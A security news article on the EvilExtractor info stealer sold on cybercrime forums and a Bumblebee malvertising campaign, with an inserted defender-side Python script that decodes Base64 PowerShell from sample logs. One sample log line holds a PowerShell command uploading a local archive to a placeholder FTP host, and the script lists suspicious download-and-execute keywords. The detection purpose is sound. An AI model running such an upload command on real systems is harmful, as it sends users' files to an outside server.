New All-in-One “EvilExtractor” Stealer For Windows Systems Surfaces On The Dark Web

A new “all-in-one” stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems.

“It includes several modules that all work via an FTP service,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server.”

The majority of the malware’s March 2023 victims were located in Europe and the United States, according to the network security firm. EvilExtractor was first released for use in the classroom, but it has since been co-opted by threat actors looking to steal sensitive data.

Beginning on October 22, 2022, an actor going by the name of Kodex began selling the attack kit on cybercrime forums like Cracked. Constantly updated, it includes a suite of modules that can steal metadata from the system, passwords and cookies from infected browsers, keystrokes, and even encrypt files as ransomware.

The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their “account details.”

The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.
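As an added, defender-side example that is not part of the original article: a small Python triage routine that pulls a Base64-encoded PowerShell command out of constructed process-creation log lines, decodes it (PowerShell expects the script as UTF-16LE) and flags strings such as an FTP destination that match the loader-to-FTP behaviour described above. The sample log lines, the `-enc` spellings covered and the indicator list are assumptions for illustration.

```python
import base64
import re

# Common spellings of the encoded-command switch, followed by a Base64 blob.
# "-e" alone matches only when whitespace and a blob follow, so "-ExecutionPolicy" is skipped.
ENC_SWITCH = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Strings a defender would treat as suspicious inside a decoded loader script (assumed list).
SUSPICIOUS = ("ftp://", "net.webclient", "downloadstring", "invoke-expression", "iex ")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded-command blob, else None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command; leave it for other rules


def triage(cmdline: str) -> dict:
    """Report whether the line used an encoded command and which indicators the script contains."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "hits": []}
    low = script.lower()
    return {"encoded": True, "hits": [s for s in SUSPICIOUS if s in low]}


def _ps_encode(script: str) -> str:
    # Helper used only to build the constructed sample log lines below.
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed Sysmon-style process-creation lines, not real telemetry.
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -NoProfile -enc " + _ps_encode("Get-Date"),
    "CommandLine: powershell.exe -w hidden -EncodedCommand " + _ps_encode(
        "$c=New-Object Net.WebClient;$c.UploadFile('ftp://exfil.example.invalid/u','C:\\Users\\Public\\data.zip')"),
    "CommandLine: notepad.exe C:\\Users\\Public\\Account_Info.pdf",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(triage(line), "<-", line[:60])
```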

“EvilExtractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware,” Lin said. “Its PowerShell script can elude detection in a .NET loader or PyArmor. Within a very short time, its developer has updated several functions and increased its stability.”

The findings come as Secureworks Counter Threat Unit (CTU) detailed a malvertising and SEO poisoning campaign used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.

Bumblebee, first documented a year ago by Google’s Threat Analysis Group and Proofpoint, is a modular loader that is primarily propagated through phishing techniques. It is suspected to have been developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

Since Microsoft disabled macros in Internet-downloaded versions of Office, there has been an increase in the use of SEO poisoning and malicious advertisements to divert users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers.

According to the cybersecurity firm, threat actors used Bumblebee to gain initial access and, roughly three hours later, moved laterally to deploy Cobalt Strike and legitimate remote access software such as AnyDesk and Dameware. The intrusion was stopped before the ransomware could be deployed as the final stage of the attack.

“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”
